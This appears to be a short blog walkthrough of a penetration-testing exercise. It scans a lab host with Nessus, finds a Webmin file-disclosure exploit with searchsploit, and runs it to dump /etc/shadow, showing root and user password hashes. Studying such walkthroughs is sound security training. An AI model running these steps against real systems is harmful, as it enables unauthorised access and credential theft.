Senin, 30 Januari 2012

PRIVILEGE ESCALATION


Privilege Escalation
The target IP address is first scanned with Nessus.
After the Nessus scan completes,

double-click on the completed scan, and the display below will appear.


Select protocol TCP and choose port number 10000,
open it and select the service named Webmin; the results of our live analysis are shown below.

After that we search Exploit-DB for a Webmin exploit that can read /etc/shadow (the arbitrary file disclosure affecting Webmin &lt; 1.290 listed below).
 
root@bt:/pentest/exploits/exploitdb# ls
files.csv  platforms  searchsploit
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# ls -lia
total 2300
1969260 drwxr-xr-x  4 root root    4096 2012-01-16 23:03 .
1967574 drwxr-xr-x  9 root root    4096 2011-08-17 02:42 ..
1969268 -rwxr-xr-x  1 root root 2316060 2012-01-16 23:03 files.csv
2101860 drwxr-xr-x 40 root root   20480 2012-01-02 14:48 platforms
1969269 -rwxr-xr-x  1 root root    1124 2011-06-12 02:05 searchsploit
2101859 drwxr-xr-x  6 root root    4096 2012-01-16 23:03 .svn
root@bt:/pentest/exploits/exploitdb# ./searchsploit  httpd
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Apache HTTPd Arbitrary Long HTTP Headers DoS                                /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)                    /linux/dos/371.c
Sumus 0.2.2 httpd Remote Buffer Overflow Exploit                            /linux/remote/940.c
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS                         /linux/dos/1746.pl
RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit        /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit                           /windows/remote/2482.pl
corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit                  /linux/remote/4243.c
EDraw Office Viewer Component 5.1  HttpDownloadFile() Insecure Method       /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit                   /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC                           /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit                   /linux/remote/4437.c
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities                        /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities                        /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit                /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit                 /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability          /multiple/remote/5215.txt
VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit                  /windows/remote/5519.c
Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC                  /hardware/dos/6394.pl
fhttpd 0.4.2 un64() Remote Denial of Service Exploit                        /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit                 /hardware/dos/7535.php
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln             /windows/remote/7762.html
SW-HTTPD Server 0.x Remote Denial of Service Exploit                        /multiple/dos/8245.c
httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities            /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)                   /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)                    /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)    /multiple/remote/8786.txt
httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit        /windows/remote/8897.c
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit        /windows/dos/9657.pl
httpdx <= 1.4.6b source disclosure                                          /windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF                                                 /windows/remote/9886.txt
httpdx 1.4 Get Request Buffer Overflow                                      /windows/remote/10053.txt
OrzHTTPd Format String Exploit                                              /linux/remote/10282.py
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)                     /windows/dos/11343.py
RCA DCM425 Cable Modem micro_httpd DoS/PoC                                  /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)         /windows/dos/11734.py
Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC                    /hardware/dos/13774.pl
Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC      /windows/dos/14683.py
httpdASM 0.92 Directory Traversal                                           /windows/remote/15861.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download                       /windows/remote/16075.pl
HTTPDX tolog() Function Format String Vulnerability                         /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)                    /win32/remote/16759.rb
HTTPDX tolog() Function Format String Vulnerability                         /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer Overflow                              /windows/remote/16799.rb
jHTTPd 0.1a Directory Traversal Vulnerability                               /multiple/remote/17068.py
Simple HTTPd 1.42 Denial of Servive Exploit                                 /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability          /windows/remote/17669.py
Apache httpd Remote Denial of Service (memory exhaustion)                   /multiple/dos/17696.pl
FleaHttpd Remote Denial Of Service Exploit                                  /linux/dos/18120.py
lighttpd Denial of Service Vulnerability PoC                                /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path                                                                                      
--------------------------------------------------------------------------- -------------------------                                                                  
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl                                                                    
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi                                                                   
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl                                                                    
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php                                                                  
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl                                                                   
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt                                                                      
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt                                                                      
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                      
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                       
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                      
root@bt:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~
root@bt:/pentest/exploits/exploitdb# cd
root@bt:~# ls
2017.pl  5709.pl  Desktop  VirtualBox VMs  xGPS Manager
root@bt:~# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@bt:~# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:~# perl 2017.pl 192.168.0.112 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.112 on port 10000!
FILENAME:  /etc/shadow

The contents of /etc/shadow returned by the exploit:


 FILE CONTENT STARTED

 -----------------------------------

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

 -------------------------------------

